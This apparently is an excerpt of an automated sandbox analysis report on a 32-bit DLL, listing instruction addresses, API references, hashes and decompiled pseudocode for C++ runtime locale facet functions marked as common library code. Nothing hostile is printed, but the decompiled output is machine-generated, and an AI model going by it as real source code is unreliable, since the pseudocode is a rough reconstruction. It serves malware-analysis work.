                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6
                          0x6e21b849
                          0x6e21b849
                          0x6e21b84c
                          0x6e21b850
                          0x6e21b854
                          0x6e21b861
                          0x6e21b869
                          0x6e21b86b
                          0x00000000
                          0x6e21b86b
                          0x6e21b832
                          0x6e21b832
                          0x00000000
                          0x6e21b832
                          0x6e21b830
                          0x6e21b7a3
                          0x6e21b7a3
                          0x6e21b7a6
                          0x6e21b7aa
                          0x6e21b7ae
                          0x6e21b7bb
                          0x6e21b7c3
                          0x6e21b7c5
                          0x00000000
                          0x6e21b7c5
                          0x6e21b78c
                          0x6e21b78c
                          0x00000000
                          0x6e21b78c
                          0x6e21b78a

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B753
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B75D
                          • int.LIBCPMT ref: 6E21B774
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E21B797
                          • std::_Facet_Register.LIBCPMT ref: 6E21B7AE
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B7CE
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B7EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID:
                          • API String ID: 2363045490-0
                          • Opcode ID: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
                          • Instruction ID: 7624d2fd8d0dbc0651cbef8b4529f7c1278a29cac0ae02a43c025bbc50aa34c0
                          • Opcode Fuzzy Hash: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
                          • Instruction Fuzzy Hash: 8311E77A91461ECBCF00DBE0C894EFDB7BBAF44B14F140909E510AB390DBB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B7F2, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E21BFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E21C050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E21C0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E21C120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E21C1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E21C229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21C295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21D028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}



























                          0x6e21b7f2
                          0x6e21b7f2
                          0x6e21b7f9
                          0x6e21b803
                          0x6e21b808
                          0x6e21b813
                          0x6e21b817
                          0x6e21b81a
                          0x6e21b81f
                          0x6e21b823
                          0x6e21b828
                          0x6e21b82c
                          0x6e21b871
                          0x6e21b874
                          0x6e21b880
                          0x6e21b82e
                          0x6e21b830
                          0x6e21b836
                          0x6e21b83c
                          0x6e21b844
                          0x6e21b847
                          0x6e21b884
                          0x6e21b892
                          0x6e21b897
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8ce
                          0x6e21b8d0
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6
                          0x6e21b849
                          0x6e21b849
                          0x6e21b84c
                          0x6e21b850
                          0x6e21b854
                          0x6e21b861
                          0x6e21b869
                          0x6e21b86b
                          0x00000000
                          0x6e21b86b
                          0x6e21b832
                          0x6e21b832
                          0x00000000
                          0x6e21b832
                          0x6e21b830

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B7F9
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B803
                          • int.LIBCPMT ref: 6E21B81A
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E21B83D
                          • std::_Facet_Register.LIBCPMT ref: 6E21B854
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B874
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B892
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID:
                          • API String ID: 438560357-0
                          • Opcode ID: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
                          • Instruction ID: fa31074f765baaf55ad792064010492f97346163ee0330b65fad62241eb71be0
                          • Opcode Fuzzy Hash: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
                          • Instruction Fuzzy Hash: 8311E079D0451ECBCF00EBE4C894AEDB7BBBF48B18F150919E510AB390DBB49A44CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F567, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t550 - 0x14, 0);
				_t525 =  *0x6e2c6df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6E1E161C(0x6e2c6da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6E2066BA(_t550 - 0x14);
					return E6E220075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6E211127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t550 - 0x20);
							E6E223D74(_t550 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t512, _t525, 0x14);
							E6E206653(_t550 - 0x14, 0);
							_t526 =  *0x6e2c6df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6E1E161C(0x6e2c6da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6E2066BA(_t550 - 0x14);
								return E6E220075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6E2111AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t550 - 0x20);
										E6E223D74(_t550 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t389, _t513, _t526, 0x14);
										E6E206653(_t550 - 0x14, 0);
										_t527 =  *0x6e2c6dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6E1E161C(0x6e2c6d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6E2066BA(_t550 - 0x14);
											return E6E220075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6E211230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t550 - 0x20);
													E6E223D74(_t550 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t389, _t514, _t527, 0x14);
													E6E206653(_t550 - 0x14, 0);
													_t528 =  *0x6e2c6dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6E1E161C(0x6e2c6d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6E2066BA(_t550 - 0x14);
														return E6E220075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6E2112B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t550 - 0x20);
																E6E223D74(_t550 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t389, _t515, _t528, 0x14);
																E6E206653(_t550 - 0x14, 0);
																_t529 =  *0x6e2c6dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6E1E161C(0x6e2c6d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6E2066BA(_t550 - 0x14);
																	return E6E220075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6E211339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t550 - 0x20);
																			E6E223D74(_t550 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t389, _t516, _t529, 0x14);
																			E6E206653(_t550 - 0x14, 0);
																			_t530 =  *0x6e2c6db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6E1E161C(0x6e2c6d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6E2066BA(_t550 - 0x14);
																				return E6E220075(_t517);
																			} else {
																				__eflags = _t530;
